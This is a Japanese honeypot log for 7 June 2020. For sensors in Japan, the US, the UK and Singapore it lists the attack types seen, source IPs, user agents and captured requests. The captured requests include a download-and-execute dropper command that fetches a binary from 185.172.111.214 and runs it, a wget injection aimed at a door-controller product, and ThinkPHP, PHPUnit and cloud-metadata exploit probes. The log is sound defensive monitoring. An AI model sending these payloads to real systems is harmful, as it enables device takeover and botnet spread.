ハニーポット(仮) 観測記録 2020/06/07分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.172.111.214/bins/UnHAnaAW.x86; chmod 777 /tmp/UnHAnaAW.x86; sh /tmp/UnHAnaAW.x86
Location:US
Axis製品の脆弱性を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTCによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.172.111.214/bins/UnHAnaAW.x86; chmod 777 /tmp/UnHAnaAW.x86; sh /tmp/UnHAnaAW.x86 w00dy.jaws
Location:UK
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。
Location:SG
DrayTek製品の脆弱性を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
123[.]126[.]104[.]68に関する不正通信
を確認しました。
他
アクセス数推移
JP:総アクセス数:79 (前日比:-84)
US:総アクセス数:30 (前日比:-88)
UK:総アクセス数:19 (前日比:-18)
SG:総アクセス数:48 (前日比:+31)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.9.175.41 | Malaysia |
1 | 18.176.56.123 | United States |
34 | 44.225.84.206 | United States |
2 | 45.141.84.40 | Russia |
1 | 47.206.38.79 | United States |
4 | 80.82.77.33 | Netherlands |
28 | 89.135.141.89 | Hungary |
1 | 109.184.64.24 | Russia |
1 | 113.14.202.161 | China |
1 | 142.111.201.122 | United States |
1 | 162.243.141.121 | United States |
1 | 162.243.142.155 | United States |
1 | 177.207.81.134 | Brazil |
1 | 190.128.226.34 | Paraguay |
1 | 200.52.44.207 | Mexico |
UserAgent一覧
件数 | UserAgent |
---|---|
26 | - |
14 | AWS Security Scanner |
1 | Go-http-client/1.1 |
1 | Hello, World |
1 | Hello, world |
2 | Mozilla/5.0 |
28 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 |
2 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
1 | curl/7.29.0 |
1 | polaris botnet |
1 | python-requests/2.23.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
2 | \x03 | ||
10 | \x16\x03\x01 | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
1 | GET | /admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /database/index.php?lang=en | HTTP/1.1 |
1 | GET | /db/index.php?lang=en | HTTP/1.1 |
1 | GET | /db/phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin1/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
1 | GET | /pma/index.php?lang=en | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /program/index.php?lang=en | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86 | HTTP/1.1 |
1 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /t | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 24.138.226.129 | Puerto Rico |
1 | 37.49.226.24 | Netherlands |
1 | 41.78.172.77 | Nigeria |
2 | 45.141.84.40 | Russia |
10 | 116.199.2.34 | China |
1 | 190.96.67.243 | Chile |
10 | 195.54.160.135 | Russia |
2 | 198.178.8.34 | United States |
1 | 200.46.45.114 | Panama |
1 | 201.21.226.33 | Brazil |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
2 | AccServer[NCO-AVIGILON02]/6.2.2.6(40263) 64-bit HTTP-Agent |
1 | Go-http-client/1.1 |
1 | Hello, world |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
1 | \x16\x03\x01\x02 | ||
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
2 | GET | /axis-cgi/admin/param.cgi?action=list&group=Properties | HTTP/1.0 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 45.141.84.40 | Russia |
1 | 83.110.9.93 | United Arab Emirates |
1 | 95.9.202.235 | Turkey |
1 | 104.199.191.188 | United States |
1 | 162.243.141.12 | United States |
1 | 162.243.143.49 | United States |
12 | 195.54.160.135 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 zgrab/0.x |
1 | XTC BOTNET |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /t | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 14.241.249.199 | Vietnam |
1 | 61.219.11.153 | Taiwan |
1 | 91.203.61.191 | Ukraine |
10 | 122.51.29.221 | China |
7 | 148.70.99.99 | China |
1 | 162.243.138.141 | United States |
1 | 185.202.2.149 | Netherlands |
1 | 185.244.39.112 | Netherlands |
1 | 191.180.225.24 | Brazil |
19 | 195.54.160.135 | Russia |
2 | 208.91.109.50 | United States |
1 | 217.58.61.49 | Italy |
2 | 222.129.37.226 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 |
19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
16 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) |
1 | Mozilla/5.0 zgrab/0.x |
2 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x03 | ||
1 | CONNECT | 123[.]126[.]104[.]68:80 | HTTP/1.1 |
3 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
3 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
1 | GET | /card_scan_decoder.php?No=30&door=%60wget http[:]//switchnets[.]net/hoho.arm7; | |
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
3 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//js[.]sogou[.]com/pv_sogou.js | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
3 | POST | /api/jsonws/invoke | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |